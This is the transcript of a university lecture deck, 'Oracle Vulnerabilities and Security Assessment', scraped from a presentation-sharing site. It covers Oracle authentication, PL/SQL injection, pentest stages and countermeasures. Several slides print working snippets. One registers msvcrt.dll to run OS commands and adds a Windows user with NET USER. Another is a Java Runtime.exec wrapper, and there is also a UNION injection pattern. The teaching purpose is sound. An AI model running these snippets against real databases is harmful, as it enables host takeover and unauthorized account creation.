information system security l.
Download
Skip this Video
Download Presentation
Oracle Vulnerabilities and Security Assessment

Loading in 2 Seconds...

play fullscreen
1 / 44

Oracle Vulnerabilities and Security Assessment - PowerPoint PPT Presentation


  • 317 Views
  • Uploaded on

Information System Security. Oracle Vulnerabilities and Security Assessment. Outline. Oracle Vulnerabilities Oracle Security Assessment. Outline. Oracle Vulnerabilities Oracle Security Assessment. Ways to attack. Outline. Oracle Vulnerabilities Users/Passwords PL/SQL injection

loader
I am the owner, or an agent authorized to act on behalf of the owner, of the copyrighted work described.
capcha
Download Presentation

PowerPoint Slideshow about 'Oracle Vulnerabilities and Security Assessment' - deirdra


Download Now An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript
outline
Outline
  • Oracle Vulnerabilities
  • Oracle Security Assessment

Information System Security - Week 10

outline3
Outline
  • Oracle Vulnerabilities
  • Oracle Security Assessment

Information System Security - Week 10

ways to attack
Ways to attack

Information System Security - Week 10

outline5
Outline
  • Oracle Vulnerabilities
    • Users/Passwords
    • PL/SQL injection
    • Running System Commands
    • Other Vulnerabilities

Information System Security - Week 10

users passwords
Users/Passwords
  • TNS protocol
  • How Oracle authenticates users?
  • Vulnerabilities

Information System Security - Week 10

tns protocol
TNS protocol

Information System Security - Week 10

tns protocol cont
TNS protocol (cont)
  • TNS Listener is the hub of all communications in Oracle.
  • Information gathering can be done through TNS.

Connect

Client

Listener

Accept or Redirect

Information System Security - Week 10

tns protocol cont9
TNS protocol (cont)

Information System Security - Week 10

authentication process
Authentication process

Client

Server

Send Username

Generates Secret Number

Send AUTH_SESSKEY

Decrypts AUTH_SESSKEY

Encrypts Password

Compares with the password hash from database.

Send AUTH_PASSWORD

Authenticated

Information System Security - Week 10

how about oracle 11g
How about Oracle 11g

Client

Server

Send Username

Generates Secret Number

Decrypts AUTH_SESSKEY

Generates own AUTH_SESSKEY

Combines 2 AUTH_SESSKEY 

Encrypt Password

Send AUTH_SESSKEY

and AUTH_VFR_DATA

Authenticated

Compares with the password hash from database.

Send AUTH_PASSWORD

Information System Security - Week 10

vulnerabilities
Vulnerabilities
  • Crypto Aspect
    • If we have the password (hash)  get clear text password

Information System Security - Week 10

vulnerabilities cont
Vulnerabilities (cont)
  • Default Usernames/Passwords.
  • Files for passwords.
  • Brute-force.

Information System Security - Week 10

pl sql injection
PL/SQL Injection
  • Introduction
  • Procedures, functions
  • Triggers
  • VPD

Information System Security - Week 10

introduction
Introduction
  • PL/SQL is the programming language built into Oracle extends SQL.
  • Can call external library (C or Java).
  • Used to create procedures, functions, triggers…

Information System Security - Week 10

introduction cont
Introduction (cont)
  • Execution privileges.
    • Definer privileges: “owner” rights.
    • Invoker privileges:

Keyword: AUTHID CURRENT_USER

  • PL/SQL can be wrapped  working without source: DESCribe feature.

Information System Security - Week 10

procedures
Procedures
  • Similar to SQL injection.
  • PL/SQL injection can occur with a statement like this:

Select * from table_name where id=‘USER_INPUT’

Select * from table_name where id=‘XXX’ UNION SELECT ….

Information System Security - Week 10

procedures cont
Procedures (cont)
  • Inject function to PL/SQL statement.
    • Keyword: AUTONOMOUS_TRANSACTION
  • Take advantage of what right functions/procedures are based on.

Information System Security - Week 10

triggers
Triggers
  • Similar to procedures/functions injection.
  • Note: Triggers run with definer right.
  • Some real-world examples:
    • MDSYS.SDO_DROP_USER_BEFORE
    • MDSYS.SDO_GEOM_TRIG_INS1

Information System Security - Week 10

slide20
VPD
  • VPD is based on policy function.
  • Can be exploited through PL/SQL injection to drop policy.
  • Or exploited to grant EXEMPT ACCESS POLICY privilege
  • Another way to defeat VPD is reading raw file  HARD

Information System Security - Week 10

running system commands
Running System Commands
  • Through PL/SQL
  • Through Java
  • Access File System
  • Access Network

Information System Security - Week 10

through pl sql
Through PL/SQL
  • Use msvcrt.dll library to exec system command.
  • Must have create library privilege to register library in oracle
  • Newer versions of Oracle only accept libraries in Oracle_home/bin

Information System Security - Week 10

through pl sql cont
Through PL/SQL (cont)
  • CREATE OR REPLACE LIBRARY exec_shell AS 'C:\winnt\system32\msvcrt.dll';
  • CREATE OR REPLACE PROCEDURE oraexec (cmdstring IN CHAR)
  • IS EXTERNAL
  • NAME "system"
  • LIBRARY exec_shell
  • LANGUAGE C;
  • EXEC ORAEXEC('NET USER MYACCOUNT PASSWORD /ADD');

Information System Security - Week 10

through java
Through Java
  • Don’t need create library privilege.
  • Require:
    • Execute on all files.
    • Write File Descriptor.
    • Read File Descriptor.

Information System Security - Week 10

through java cont
Through Java (cont)
  • CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "JAVACMD" AS
  • import java.lang.*;
  • import java.io.*;
  • public class JAVACMD
  • {
  • public static void execCommand (String command) throws IOException
  • {
  • Runtime.getRuntime().exec(command);
  • }
  • };

Information System Security - Week 10

other ways
Other ways
  • Using DBMS Scheduler.
  • Using Job Scheduler.
  • Using Alter System statement.

Information System Security - Week 10

access file system
Access File System
  • Use UTL_FILE library
  • Need to have privilege to access DIRECTORY object or create a new one.
  • Using Java: is similar to running OS command.
    • Need Read and Write permission

Information System Security - Week 10

access network
Access Network
  • Use UTL_TCP or UTL_HTTP.
  • Create connection to a remote host  transfer data.

Information System Security - Week 10

other vulnerabilities
Other Vulnerabilities
  • System Configurations
    • O7_DICTIONARY_ACCESSIBILITY
    • remote_os_authent
    • dblink_encrypt_login
    • ..
  • TNS protocol settings
  • Application vulnerabilities

Information System Security - Week 10

other vulnerabilities30
Other Vulnerabilities
  • Session attack
    • http://www.youtube.com/watch?v=jjRrLJEbDQU
  • Access Control bypass in Login
    • http://www.securityfocus.com/archive/1/422253

Information System Security - Week 10

outline31
Outline
  • Oracle Vulnerabilities
  • Oracle Security Assessment

Information System Security - Week 10

oracle assessment
Oracle Assessment
  • Vulnerability scanning
  • Penetration testing

Information System Security - Week 10

vulnerability scanning
Vulnerability scanning
  • Look for evidence of
  • Vulnerable software versions
  • Presence or lack of patches
  • Misconfiguration

Information System Security - Week 10

vulnerability assessment tool
Vulnerability assessment tool
  • Secure Oracle Auditor™ (SOA)

Information System Security - Week 10

penetration test
Penetration test
  • A penetration test (pentest) is a method of evaluating the security of a computer system or network by simulating an attack from a malicious source.

Information System Security - Week 10

penetration test36
Penetration test
  • Stages:
      • Scope/Goal Definition
      • Information Gathering
      • Vulnerability Detection
      • Information Analysis and Planning.
      • Attack& Penetration/Privilege Escalation.
      • Result Analysis & Reporting.
      • Cleanup.

Information System Security - Week 10

information gathering
Information gathering
  • Footprint
    • The first and most convenient way that hackers use to gather information.
    • Includes: internet, remote access,extranet…
    • Example: whois hvaonline.net

Information System Security - Week 10

information gathering38
Information gathering
  • Example:

Information System Security - Week 10

attack
Attack
  • SQL script

Information System Security - Week 10

vulnerability assessment tool40
Vulnerability assessment tool
  • AppDetectivePro for Oracle
  • Metasploit

Information System Security - Week 10

database services countermeasures
Database Services Countermeasures
  • Remove default accounts, assign strong passwords to existing accounts, and begin the audit facility for failed logins.
  • Keep the databases patched
  • Reducing the privileges such as PUBLIC, keeping the privileges to a minimum, and auditing access to critical tables and views.

Information System Security - Week 10

summary
Summary
  • Vulnerabilities usually occur based on granting inappropriate privileges.
    • CREATE ANY PROCEDURE
    • CREATE ANY TRIGGER
    • CREATE ANY VIEW
    • GRANT Something to PUBLIC

Information System Security - Week 10

references
References
  • Oracle Hacker’s HandBook
  • Database Hacker’s HandBook
  • http://www.petefinnigan.com/weblog/
  • http://soonerorlater.hu/index.khtml?article_id=512

Information System Security - Week 10